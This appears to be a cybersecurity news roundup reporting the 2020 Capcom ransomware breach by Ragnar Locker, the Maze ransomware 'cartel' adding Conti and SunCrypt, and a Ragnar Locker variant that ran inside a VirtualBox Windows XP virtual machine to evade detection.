Capcom unfazed a breach and it’s serious

Capcom, home to many iconic franchises such as Street Fighter,Resident Evil and Monster Hunter, is the latest victim of a cyber attack.  Report claims that Capcom was the victim of a ransomeware attack by a program called Ragnar Locker. Ragnar Locker is a specific Ransom that attacks vulnerable systems by peppering them with small scale attacks until it finally breaks through.

Capcom stated that the attack occurred in the early hours of November 2 and affected access to certain systems, including email and file servers. Capcom has confirmed a third party was responsible for the attack. As a result of the attack, Capcom says it has halted some operations of its internal networks

“Capcom expressed its deepest regret for any inconvenience this may cause to its various stakeholders,” Capcom wrote. “Further, it stated that at present there is no indication that any customer information was breached. This incident has not affected connections for playing the company’s games online or access to its various websites.

Ransomware has been on the rise lately and is the latest cyber security threat that big organizations need to be wary of. As the name suggests, once the information is stolen, those responsible for the attack hold the information hostage until demands are met. The trade-away being that the attackers promise to delete the information once their payment has been received. Although as ransomware attacks continue, this is becoming increasingly less common.

The attackers claim to have stolen 1 TB of unencrypted files from the corporate networks in Japan, USA, and Canada. This includes all kinds of private and sensitive corporate data ranging from financial reports, intellectual property information, and even company emails and messenger conversations.

But Capcom claimed no data has been stolen and all are intact. Working on restoring the systems

Maze Cartel ! Expands

The Maze ransomware “cartel” is growing.

Two more ransomware gangs, Conti and SunCrypt, have apparently joined the Maze collective, which currently consists of Maze, LockBit and Ragnar Locker.

Maze operators announced the creation of a ransomware cartel that included other cybercrime gangs, which teamed up to share resources, leak victims’ data on Maze’s “news” site and extort their victims.

The Conti ransomware gang, which recently launched its own data leak site, is collaborating with Maze. “They’ve published data from a number of Maze attacks,”.

Conti may be a replacement for Ryuk, which has seen a significant dip in activity in recent weeks. It shares some of its code with Ryuk, uses the same note and also the same infrastructure, which could indicate it was created by the Ryuk team or a splinter group.

Recently,researchers came across a leak disclosure post in which Conti ransomware operators claim to have allegedly breached the Volkswagen Group.

The further expansion highlights Maze’s increasing momentum, which has claimed responsibility for several high-profile ransomware attacks in recent months. Earlier this month, a major cyberattack on technology giant Canon was believed to the latest work of the cybercriminal gang.

Ragnar Locker Ransomware

Threat actors have developed a new type of attack method by hiding Ragnar Locker ransomware inside a virtual machine to avoid detection

Ragner Locker

Ragnar Locker ransomware attack that “takes defense evasion to a new level.” According to the post, this variant was deployed inside a Windows XP virtual machine in order to hide the malicious code from anti malware detection. The  Virtual Machine includes an old version of the Sun xVM Virtual Box, which is a free, open source hypervisor that was acquired by Oracle when it acquired Sun Microsystems in 2010.

“In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,”

The MSI package contained Sun xVM VirtualBox version 3.0.4, which was released August of 2009, and “an image of a stripped-down version of the Windows XP SP3 operating system, called MicroXP v0.82.” In that image is a 49 KB Ragnar Locker executable file.

“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,”

This was the first time seen virtual machines used for ransomware attacks.

It’s unclear how many organizations were affected by this recent attack and how widespread it was. In the past, the Ragnar Locker ransomware group has targeted managed service providers and used their remote access to clients to infect more organizations.